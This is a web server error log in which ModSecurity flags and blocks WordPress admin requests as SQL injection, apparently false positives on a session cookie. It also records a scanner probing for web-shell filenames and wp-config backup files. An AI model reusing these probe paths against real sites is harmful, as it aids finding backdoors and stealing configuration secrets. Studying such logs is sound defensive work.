[Mon May 11 22:28:07.250855 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI713o_DFxNSZVmaX3RUAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:07.854118 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI713o_DFxNSZVmaX3RUAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:08.542769 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI72Ho_DFxNSZVmaX3RUgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:08.543028 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI72Ho_DFxNSZVmaX3RUgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:09.088344 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI72Ho_DFxNSZVmaX3RUgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:09.862212 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI72Xo_DFxNSZVmaX3RVAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:09.862489 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI72Xo_DFxNSZVmaX3RVAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:10.401838 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI72Xo_DFxNSZVmaX3RVAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:10.635873 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI72no_DFxNSZVmaX3RVgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:10.636144 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI72no_DFxNSZVmaX3RVgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:11.021347 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI72no_DFxNSZVmaX3RVgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:11.633210 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI723o_DFxNSZVmaX3RWAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:11.633469 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI723o_DFxNSZVmaX3RWAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:11.836538 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/moon.php
[Mon May 11 22:28:11.936309 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/a1.php
[Mon May 11 22:28:12.036598 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/ahax.php
[Mon May 11 22:28:12.138075 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/lite.php
[Mon May 11 22:28:12.250147 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/k.php
[Mon May 11 22:28:12.283397 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI723o_DFxNSZVmaX3RWAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:12.351122 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/leaf.php
[Mon May 11 22:28:12.738280 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI73Ho_DFxNSZVmaX3RXwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:12.738573 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI73Ho_DFxNSZVmaX3RXwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:12.958984 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/wp-conflg.php
[Mon May 11 22:28:13.060350 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/wp_filemanager.php
[Mon May 11 22:28:13.160875 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/pp.php
[Mon May 11 22:28:13.323046 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI73Ho_DFxNSZVmaX3RXwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:13.392136 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/index26.php
[Mon May 11 22:28:13.495178 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/12.php
[Mon May 11 22:28:13.597847 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/Marvins.php
[Mon May 11 22:28:13.707764 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "k06.fr"] [uri "/wp-config.php.backup"] [unique_id "agI73Xo_DFxNSZVmaX3RZwAAAMI"]
[Mon May 11 22:28:13.707922 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "k06.fr"] [uri "/wp-config.php.backup"] [unique_id "agI73Xo_DFxNSZVmaX3RZwAAAMI"]
[Mon May 11 22:28:13.708133 2026] [security2:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "k06.fr"] [uri "/wp-config.php.backup"] [unique_id "agI73Xo_DFxNSZVmaX3RZwAAAMI"]
[Mon May 11 22:28:13.811219 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/aa.php
[Mon May 11 22:28:14.355252 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI73no_DFxNSZVmaX3RaQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:14.355533 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI73no_DFxNSZVmaX3RaQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:14.488985 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/abcd.php
[Mon May 11 22:28:14.973341 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI73no_DFxNSZVmaX3RaQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:15.124796 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/a2.php
[Mon May 11 22:28:15.229614 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/wp-gr.php
[Mon May 11 22:28:15.331949 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/xynz1.php
[Mon May 11 22:28:15.434282 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/uqcxit7i.php
[Mon May 11 22:28:15.536372 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/display_info.php
[Mon May 11 22:28:15.640074 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/wp-config-disabled.php
[Mon May 11 22:28:15.741107 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI733o_DFxNSZVmaX3RcgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:15.741376 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI733o_DFxNSZVmaX3RcgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:16.234826 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/test_info.php
[Mon May 11 22:28:16.329770 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI733o_DFxNSZVmaX3RcgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:16.544506 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI74Ho_DFxNSZVmaX3RdAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:16.544787 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI74Ho_DFxNSZVmaX3RdAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:16.803308 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/spip.php
[Mon May 11 22:28:16.904410 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/wp-index.php
[Mon May 11 22:28:17.007595 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/php-nginx.php
[Mon May 11 22:28:17.111841 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/wp-config.test.php
[Mon May 11 22:28:17.144721 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI74Ho_DFxNSZVmaX3RdAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:17.342444 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI74Xo_DFxNSZVmaX3RegAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:17.342720 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI74Xo_DFxNSZVmaX3RegAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:28:17.373442 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/op.php
[Mon May 11 22:28:17.479623 2026] [:error] [pid 1606352:tid 1606421] [client 20.220.233.65:36162] File does not exist: /home/kfr/public_html/mandrill.php
